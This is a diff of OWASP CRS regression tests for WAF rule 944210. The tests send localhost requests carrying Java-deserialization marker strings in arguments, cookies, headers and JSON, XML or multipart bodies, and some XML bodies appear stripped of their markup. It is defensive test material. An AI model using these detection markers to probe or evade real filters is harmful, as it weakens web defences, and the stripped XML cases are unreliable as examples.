User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944210\"" - - test_title: 944210-24 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + 
uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + log: + no_expect_ids: [944210] + - test_id: 24 desc: "XML attribute name includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944210\"" - - test_title: 944210-25 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + no_expect_ids: [944210] + - test_id: 25 desc: "XML attribute value includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-26 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944210] + - test_id: 26 desc: "XML element value includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "KztAAU" - output: - log_contains: "id \"944210\"" - - test_title: 944210-27 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "KztAAU" + output: + log: + expect_ids: [944210] + - test_id: 27 desc: "Nested XML element value includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "KztAAU" - output: - log_contains: "id \"944210\"" - - test_title: 944210-28 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "KztAAU" + output: + log: + expect_ids: [944210] + - test_id: 28 desc: "Content-Type text/plain includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=KztAAU" - output: - log_contains: "id \"944210\"" - - test_title: 944210-29 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=KztAAU" + output: + log: + expect_ids: [944210] + - test_id: 29 desc: "Content-Type application/json arg value includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"KztAAU\"}" - output: - log_contains: "id \"944210\"" - - test_title: 944210-30 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"KztAAU\"}" + output: + log: + expect_ids: [944210] + - test_id: 30 desc: "Content-Type application/json arg name includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"KztAAU\": \"test\"}" - output: - log_contains: "id \"944210\"" - - test_title: 944210-31 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"KztAAU\": \"test\"}" + output: + log: + expect_ids: [944210] + - test_id: 31 desc: "Content-Type multipart/form-data json arg name includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: 
"localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"KztAAU": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-32 + {"KztAAU": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] + - test_id: 32 desc: "Content-Type multipart/form-data json arg value includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: 
application/json - {"KztAAU": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-33 + {"KztAAU": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] + - test_id: 33 desc: "Content-Type multipart/form-data XML element value includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - KztAAU - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-34 + KztAAU + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] + - test_id: 34 desc: "Content-Type multipart/form-data XML element value includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - KztAAU - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-35 + KztAAU + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] + - test_id: 35 desc: "Argument test includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Cs7QAF" - output: - log_contains: "id \"944210\"" - - test_title: 944210-36 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Cs7QAF" + output: + log: + expect_ids: [944210] + - test_id: 36 desc: "Argument name includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Cs7QAF=test" - output: - log_contains: "id \"944210\"" - - test_title: 944210-37 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Cs7QAF=test" + output: + log: + expect_ids: [944210] + - test_id: 37 desc: "Cookie test includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Cs7QAF - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-38 + - input: + dest_addr: 
"127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Cs7QAF + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944210] + - test_id: 38 desc: "Cookie name includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Cs7QAF=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-39 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Cs7QAF=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944210] + - test_id: 39 desc: "Request header test includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Cs7QAF - method: 
"POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-40 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Cs7QAF + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944210] + - test_id: 40 desc: "XML element includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944210\"" - - test_title: 944210-41 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + log: + no_expect_ids: [944210] + - test_id: 41 desc: "XML attribute name includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - 
Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944210\"" - - test_title: 944210-42 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + no_expect_ids: [944210] + - test_id: 42 desc: "XML attribute value includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-43 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944210] + - test_id: 43 desc: "XML element value includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - 
Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Cs7QAF" - output: - log_contains: "id \"944210\"" - - test_title: 944210-44 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Cs7QAF" + output: + log: + expect_ids: [944210] + - test_id: 44 desc: "Nested XML element value includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Cs7QAF" - output: - log_contains: "id \"944210\"" - - test_title: 944210-45 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Cs7QAF" + output: + log: + expect_ids: [944210] + - test_id: 45 desc: "Content-Type text/plain includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: 
"gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Cs7QAF" - output: - log_contains: "id \"944210\"" - - test_title: 944210-46 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Cs7QAF" + output: + log: + expect_ids: [944210] + - test_id: 46 desc: "Content-Type application/json arg value includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Cs7QAF\"}" - output: - log_contains: "id \"944210\"" - - test_title: 944210-47 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Cs7QAF\"}" + output: + log: + expect_ids: [944210] + - test_id: 47 desc: "Content-Type application/json arg name includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Cs7QAF\": \"test\"}" - output: - log_contains: "id \"944210\"" - - test_title: 944210-48 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Cs7QAF\": \"test\"}" + output: + log: + expect_ids: [944210] + - test_id: 48 desc: "Content-Type multipart/form-data json arg name includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + 
-----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"Cs7QAF": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-49 + {"Cs7QAF": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] + - test_id: 49 desc: "Content-Type multipart/form-data json arg value includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"Cs7QAF": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-50 + {"Cs7QAF": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] + - test_id: 50 desc: "Content-Type multipart/form-data XML element value includes keyword Cs7QAF" stages: - - stage: - input: - 
